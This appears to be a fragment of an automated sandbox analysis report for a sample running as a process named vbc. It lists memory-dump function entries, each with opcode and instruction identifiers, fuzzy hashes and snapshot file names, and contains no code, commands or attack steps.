                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9464b7507f70859d18dd6c3131d1467d811b54d839bd512167ca201776f71a17
                                                                                                                                                  • Instruction ID: 30e15c7f633fc164e10c1a74e345ff88fc92a6db3451af602792f66381318350
                                                                                                                                                  • Opcode Fuzzy Hash: 9464b7507f70859d18dd6c3131d1467d811b54d839bd512167ca201776f71a17
                                                                                                                                                  • Instruction Fuzzy Hash: 8C115B71A00209ABCF05EFA8C855EBE7BB6FB48354F008499F81697340DA34EE51DB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                  • Instruction ID: f2fa1bebb99498c8e97660aa69378801d4bf3c0cfd2657e746e026f9a72466ca
                                                                                                                                                  • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                  • Instruction Fuzzy Hash: EA017C32204580DFD726CA5DC94CF3677EDFB84B60F0908A5F806CB691D638DE80C629
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0be40800f2ae6de900173846149d40c5fb2da609e8fd201335e9ea87417c821e
                                                                                                                                                  • Instruction ID: 9a0d88f3f28c045bfb06edca75a05d9f604177169add9d05edf4c4b7e7ff2c1b
                                                                                                                                                  • Opcode Fuzzy Hash: 0be40800f2ae6de900173846149d40c5fb2da609e8fd201335e9ea87417c821e
                                                                                                                                                  • Instruction Fuzzy Hash: 8301F231B15608DFC704FB6ADD4A9AE7BB9FF80614F19486AF802A7340EE30DD01C690
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8d22fd0f695caf0e40b33c7a3b92b647483dcd0cba3f5e7e859be9ecba0e11dc
                                                                                                                                                  • Instruction ID: f81280c26114a9cfb683de4ebfefe02bffcf377a33061bfeae288d12bb4c1f4d
                                                                                                                                                  • Opcode Fuzzy Hash: 8d22fd0f695caf0e40b33c7a3b92b647483dcd0cba3f5e7e859be9ecba0e11dc
                                                                                                                                                  • Instruction Fuzzy Hash: C201F2B2B00301ABCF109F98D9C0B5ABFFCAB84B90F10046AEA0497300C7B0DD4497A4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 41c802b9a8f2d6b41602e741b1597b2a93c80f62b3f4f1e258e2842dee9eea13
                                                                                                                                                  • Instruction ID: 1b724e564c1b68af8885fd425ffb90f540109ba044433f9368d8735a189b5e30
                                                                                                                                                  • Opcode Fuzzy Hash: 41c802b9a8f2d6b41602e741b1597b2a93c80f62b3f4f1e258e2842dee9eea13
                                                                                                                                                  • Instruction Fuzzy Hash: E6F0F432741A50BBC732DF968C44F17BAAAEBC4FA0F104829BA0597640CA34ED01DBA0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9173e9365f417f1d1dd5565a5543d1e9106ad236de967f451d976b23e55c788a
                                                                                                                                                  • Instruction ID: 257ed62e0c7b05e50b8e871773719d5240d1b9fe1f1b49db363017a43e2900db
                                                                                                                                                  • Opcode Fuzzy Hash: 9173e9365f417f1d1dd5565a5543d1e9106ad236de967f451d976b23e55c788a
                                                                                                                                                  • Instruction Fuzzy Hash: 420129B1A10259ABCB04DFA9E9459AEBBF8FF48704F10445AF901E7380DB74DA01CBA4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                  • Instruction ID: 62d57fe1872a4e50eaa627ff012afd984c6d465c4789ab654371d282c9a957d6
                                                                                                                                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                  • Instruction Fuzzy Hash: 86F0C2B2600610ABD335CF8DDC40E67F7EAEBC4A90F048528A546C7220EA31EE04CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3eb1e93591b5c6d66e4ae6ef19be32909f8251ba46c643edb2ec895da54158e5
                                                                                                                                                  • Instruction ID: 5e16fe7b769fa196eb7a0837a8640ef7adb07d47de1ada4d7f747f10218e70dd
                                                                                                                                                  • Opcode Fuzzy Hash: 3eb1e93591b5c6d66e4ae6ef19be32909f8251ba46c643edb2ec895da54158e5
                                                                                                                                                  • Instruction Fuzzy Hash: 10017171A10249ABCB04DFA9E8459AEB7B8FF48704F10441AF901E7350D634DA00DBA4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                  • Instruction ID: 59eeda67a57120623ee070d0c9b7dae0dd2558b7217d7b9ba5c55d1f18385b2d
                                                                                                                                                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                  • Instruction Fuzzy Hash: E1F021333446369BC7725659C845FBFA6969FC5AA4F190835F506BB204CD74CC01A7D1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 84e3085ac2cb795e55cd4555c05b3fb0c861edb4c04fac59d8dcb425b992a234
                                                                                                                                                  • Instruction ID: 4be9b803d968c228b51b4c028909b144884bf20779a8cb665b03668ded339878
                                                                                                                                                  • Opcode Fuzzy Hash: 84e3085ac2cb795e55cd4555c05b3fb0c861edb4c04fac59d8dcb425b992a234
                                                                                                                                                  • Instruction Fuzzy Hash: DD017171A10209ABCB04DFA9E8459AEBBB8EF48704F50441AF901E7350D674D900CBA4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 168921c248a1b926b192f93e2a218a99fd4c1b6b425b683eb910ab330be828ed
                                                                                                                                                  • Instruction ID: fe6e90f8baaa28a5d1d64ad93945cc34aad1797093bcdde5f910cb2f64cc777c
                                                                                                                                                  • Opcode Fuzzy Hash: 168921c248a1b926b192f93e2a218a99fd4c1b6b425b683eb910ab330be828ed
                                                                                                                                                  • Instruction Fuzzy Hash: 1A018471A10249EFCB04DFA9D8459AEB7F8FF48704F10441AF901EB350D674D900CBA4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e57e3a42a283b8771823dca16f0fd227bb121e7d9ea09d0f894c719978caf14d
                                                                                                                                                  • Instruction ID: 39d7b32a19d916d940efae66a0ab6d124797c106efd72b9dc7b07a0c01edb9ff
                                                                                                                                                  • Opcode Fuzzy Hash: e57e3a42a283b8771823dca16f0fd227bb121e7d9ea09d0f894c719978caf14d
                                                                                                                                                  • Instruction Fuzzy Hash: 72012CB1A10249AFDB04DFA9E9859EEBBB8FF48754F10445AF901E7340D634EA018BA4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 10971c53306420e868c7f3d9bc3d3fa6c9fd87ab5be1169c7bb7a995fcf59394
                                                                                                                                                  • Instruction ID: 5e94de031cd186ebe91d734d3dddcd05c27891ec76279c20bfc99f5259690565
                                                                                                                                                  • Opcode Fuzzy Hash: 10971c53306420e868c7f3d9bc3d3fa6c9fd87ab5be1169c7bb7a995fcf59394
                                                                                                                                                  • Instruction Fuzzy Hash: 28018471A10249ABCB04DFA9D845AEEBBB8FF48714F14045AF901AB380D734DA01CB58
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                  • Instruction ID: 8f9ce36c2117012f1cebc572781a607dff972981e82392aa9ef6dbf01d04154c
                                                                                                                                                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                  • Instruction Fuzzy Hash: 9BF0367220001DBFEF019F94DD80DAF7B7DEF456D8B104565FA1196160D631DD61E7A0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 08f3011ef560ef71ad641c8e9ebe45872c82ce8b33d6fcb3c85734b795abfa2c
                                                                                                                                                  • Instruction ID: 87ce46f9ea9b6551cb46fab001593398dcdb47e91579c67c634f22b997c78744
                                                                                                                                                  • Opcode Fuzzy Hash: 08f3011ef560ef71ad641c8e9ebe45872c82ce8b33d6fcb3c85734b795abfa2c
                                                                                                                                                  • Instruction Fuzzy Hash: 4501973611010DABCF129F84DC44EDE7FA6FB4C764F068655FE1966220C632E970EB81
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2a1dc230f97e0f60300b4b0cd6a8d271d7c7e4509d24b148499ec1d3ae7c396a
                                                                                                                                                  • Instruction ID: 6769d3f5a7f6bf01d0f2bd1136698f3a8392ba03cf4d4ef766632e3bb91d28e7
                                                                                                                                                  • Opcode Fuzzy Hash: 2a1dc230f97e0f60300b4b0cd6a8d271d7c7e4509d24b148499ec1d3ae7c396a
                                                                                                                                                  • Instruction Fuzzy Hash: 1701D670308A85CBE7269B6DDD4CF6537A6BB00B40F080D90B9028BBD2D7A8D5809214
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f3a61d1bd237f33ebf3a5060e5c2a86abcb7aa39d4ef10ce6eae5ecb43c1b894
                                                                                                                                                  • Instruction ID: 2fa1e2934d84a1cc6dc4060e37020a1728007a71a2b017cd42c8ef5102e4f31e
                                                                                                                                                  • Opcode Fuzzy Hash: f3a61d1bd237f33ebf3a5060e5c2a86abcb7aa39d4ef10ce6eae5ecb43c1b894
                                                                                                                                                  • Instruction Fuzzy Hash: 0AF024B23042045BF7149616CC43F3633EAFFC0650FA5882AEA059B2C0E970DD01A3D8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                  • Instruction ID: 05850024ff724d29d05dde3b2f020ef403ebfb7ef09a7b81f29e4f6acf30bca3
                                                                                                                                                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                  • Instruction Fuzzy Hash: 5BF02E39385D1347DF7DAE2A8494B2EB256BFC0D10B152D3C9442CB640DF50DD00D7A0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a6a11bc012f348cdc346ec36df971f9dc270db96c2cdaa985c17660f36ce58f2
                                                                                                                                                  • Instruction ID: 059e1819ac994b5e8ecb9d82832971435a5ea9793894fd5d91e973b3e7ed85f4
                                                                                                                                                  • Opcode Fuzzy Hash: a6a11bc012f348cdc346ec36df971f9dc270db96c2cdaa985c17660f36ce58f2
                                                                                                                                                  • Instruction Fuzzy Hash: 9AF0B4765182456BDB216B1CE889F5BBF6DFB94710F89086EF846273518A746D80CB80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: db3132cee4d51eff2f25064e310e2c068337300072fca78e0eee4276b9c1029d
                                                                                                                                                  • Instruction ID: 410acc39301f711d9412a91820482b64ca2023db50ec5efbf1991b9adcced1e5
                                                                                                                                                  • Opcode Fuzzy Hash: db3132cee4d51eff2f25064e310e2c068337300072fca78e0eee4276b9c1029d
                                                                                                                                                  • Instruction Fuzzy Hash: 4BF0B4319166D09FDF35CB68C0C8F21B7D6AB01674F284D6AD88AC7901C735DA80CE54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2e524d60a8eed5e892d7f6e739348b6d7280739401d44a669665661d9ea0022e
                                                                                                                                                  • Instruction ID: 7a6a2ab3bc69884afd1149b2ba196f65904067702aaf94a135a2b579e9968045
                                                                                                                                                  • Opcode Fuzzy Hash: 2e524d60a8eed5e892d7f6e739348b6d7280739401d44a669665661d9ea0022e
                                                                                                                                                  • Instruction Fuzzy Hash: 03F0276A52FA80B6CB215B2C649E7A12F66A741024F4A288BD5A5DB340CA78C483C332
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 15421b1081a15bdabe73940ece1e311422a38aedc6dbccfd08e6a45e523e3048
                                                                                                                                                  • Instruction ID: 396d44061e59b66b6877dbd118cb446655d5a6afcedadf07325ac22bfbbabb16
                                                                                                                                                  • Opcode Fuzzy Hash: 15421b1081a15bdabe73940ece1e311422a38aedc6dbccfd08e6a45e523e3048
                                                                                                                                                  • Instruction Fuzzy Hash: 14F0ECB1619A9A9FC722DB18C1C8F62B3E9FB017B0F099C66D81687D12C264DD80CA5C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                  • Instruction ID: 23967e5377927263e759b679a69d7839eba151a4f1a2b6f1be795ef9b50334e1
                                                                                                                                                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                  • Instruction Fuzzy Hash: 74E0D8723006406BD722AE998CC8F67776EEFC6B14F04087DB9045F251CAE6DD0982A4
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ac21478b11ed5c1be283f13c115bc86beca1d584ca8cced200f93173877640dc
• Instruction ID: 3df7a55c17bc0096e7ab4ad417b7ae5f038e4474c7d500275bc539221dbf08ee
• Opcode Fuzzy Hash: ac21478b11ed5c1be283f13c115bc86beca1d584ca8cced200f93173877640dc
• Instruction Fuzzy Hash: ECE09232200594ABC712BF29DD0AF9A7B9AEF507A4F114925B11557190CB30AC50DBD8
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                  • Instruction ID: 64adee0a8eeb7a0d84d49b07f5af0f4f0e12e5adc4ca905d17f47b364eb57167
                                                                                                                                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                  • Instruction Fuzzy Hash: 5DD0A7326045505BDB319A1CFC04FD333D9BB48760F150859B104C7150C360AC81C644
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                  • Instruction ID: 7376b44768badb5a8c4a806eb0517ca329831a58c5d2e5f92cbdbe69cc021c9a
                                                                                                                                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                  • Instruction Fuzzy Hash: 22D0123231607497CB299A96AD14FA77A16EB85AE4F1A096D780B93900C5158C92E6E0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5582fae134d6297e600747d5c34705544d139883d56a19fec24480b5087df594
                                                                                                                                                  • Instruction ID: 7517476f6bc05733407f907106427a49856b4d1bbda0f19ccce0d3bce6ca9612
                                                                                                                                                  • Opcode Fuzzy Hash: 5582fae134d6297e600747d5c34705544d139883d56a19fec24480b5087df594
                                                                                                                                                  • Instruction Fuzzy Hash: AAC09B3691B10515E5141D4DF4402F4F37AD753679F40329BD905A75015553D4550389
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fcc0d9aa13ea9b6b6966241860a24847031e3c9ba13c57cfd37d2841713c3966
                                                                                                                                                  • Instruction ID: 0ebc543bcb9d74d493d1aca4944449ee1e84f80909405befb245df49d2f11605
                                                                                                                                                  • Opcode Fuzzy Hash: fcc0d9aa13ea9b6b6966241860a24847031e3c9ba13c57cfd37d2841713c3966
                                                                                                                                                  • Instruction Fuzzy Hash: EAD0A732110144ABC702FF48CD41F453B6AEB94790F000430B40447221CA30FC60DA58
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                  • Instruction ID: a314b27d540aaec0af9477ad6e8238be1b878884bb2c60ab4184545a2ddc8447
                                                                                                                                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                  • Instruction Fuzzy Hash: 38D0C935216E81CFD62ACB4DC9A8F1573A5FB44B48FC10890E802CBB21D66CEA80CA04
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a33de908327e7be42777a4f97fe01f81d38221f0b3b08d1aab573d17aeadb48c
                                                                                                                                                  • Instruction ID: 65dfefdb38c99e404397e6f8e89747b80a37997f9cb16cc471e031ca6346910e
                                                                                                                                                  • Opcode Fuzzy Hash: a33de908327e7be42777a4f97fe01f81d38221f0b3b08d1aab573d17aeadb48c
                                                                                                                                                  • Instruction Fuzzy Hash: 60D05E72121440EFD726CB08C946F2577A4F700B44F4545B8A0068B920C728E900DB44
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                  • Instruction ID: 2d0710cc187eead7c5572337d2195a733d6b4eaeb7f458025abe5c4f56465f11
                                                                                                                                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                  • Instruction Fuzzy Hash: 13C01232250644AFC7119E94CD01F0177A9E798B90F100421F60447570C531F850E644
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
